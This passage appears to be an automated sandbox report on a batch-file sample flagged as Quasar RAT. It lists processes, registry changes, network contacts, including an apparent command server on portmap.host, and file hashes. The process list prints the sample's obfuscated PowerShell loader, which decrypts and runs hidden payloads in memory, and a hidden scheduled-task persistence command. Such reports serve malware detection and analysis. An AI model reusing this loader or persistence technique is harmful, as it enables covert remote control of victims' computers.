| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133626110297522421" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133626110483262536" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133626110909669242" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133626110487794071" | C:\Windows\system32\svchost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_3_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE3sifTTayGc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| DE | 193.161.193.99:63294 | runderscore00-63294.portmap.host | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
Files
memory/932-0-0x00007FFFF8643000-0x00007FFFF8645000-memory.dmp
memory/932-1-0x0000014AD9D40000-0x0000014AD9D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcad110i.zik.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/932-11-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/932-12-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/932-13-0x0000014ADA1A0000-0x0000014ADA1E4000-memory.dmp
memory/932-14-0x0000014ADA270000-0x0000014ADA2E6000-memory.dmp
memory/932-15-0x0000014AD9DA0000-0x0000014AD9DA8000-memory.dmp
memory/932-16-0x0000014ADA1F0000-0x0000014ADA260000-memory.dmp
memory/3088-27-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3088-28-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3088-29-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3088-31-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs
| MD5 | 6fcefd32acdcb283b971d6bf534fe606 |
| SHA1 | ef5a565bf17f800b8fe1e77f48885853dfccedc4 |
| SHA256 | 32ca545d319376eb8fcc60dfd82f77b34bbe7c9abbe2beb10c934668387455cb |
| SHA512 | dc956775fea6376cc936f286da1b03667ca1c25e975f1c0c4f68851ef482b4008f30348a1bb7a2ca954847a2dca273e7a654d79781faf181c945f98cfb1e3719 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.bat
| MD5 | a5c3bef843c9d6022db92547f32855d1 |
| SHA1 | 816338da7ee45d496f39bbd36c6b106ee0b3e2fe |
| SHA256 | ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045 |
| SHA512 | 0e44e31275a89f29388418538f57cb3437ad1d24f08d0c3c7d85a1a906c5b212024f2960237b66e3f2838923497e82f198ad8c4ed0b34548190e6db03504f1bd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/932-48-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3404-95-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/3324-98-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2352-97-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1460-100-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2772-106-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/744-110-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1680-109-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1384-108-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/800-107-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1264-105-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2660-112-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1088-111-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2360-101-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2648-104-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/952-103-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1144-102-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1368-99-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1180-96-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/3404-49-0x00000000032C0000-0x00000000032EA000-memory.dmp
memory/4204-141-0x0000014332670000-0x00000143326CE000-memory.dmp
memory/4204-142-0x0000014332AD0000-0x0000014332AE2000-memory.dmp
memory/4204-143-0x0000014332B30000-0x0000014332B6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\gE3sifTTayGc.bat
| MD5 | f9a333f41255f2baf8f86d02b1c41c6d |
| SHA1 | a33be764cc1522d9dc5b51d78b3ac47a28d21f9b |
| SHA256 | 9404d0c315ec7f13f456854fb0e3d2ff8141b5c979beae70977f42a281b64e18 |
| SHA512 | 6c4bd2479681c8940a83a913e82e2a3cb626cf2b3b943fe570351d095d71f5bc7828a0e2f0845cc8b62f2f61a7cb42fc38f17b6008594869dda4365084b28145 |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-11-~1
| MD5 | 43435dbb38b639f78be0a8f3a9f17bcb |
| SHA1 | 0d4c8ed716449eae09eaa9ff9ebb970fef9917c9 |
| SHA256 | d40292ea7921c41d6bba847456a2162dc07a8a3526f749f768d8af9d54750c24 |
| SHA512 | 022fb3bd3cd5d0e79fcbf99f4bfb94b4c20ea7ce9987df3c2bff4d647e11e0a3dae363cce26c5d11ca5a5de798a265fb59f1cb62c66f31069c346b6b92104997 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 20:23
Reported
2024-06-11 20:26
Platform
win11-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
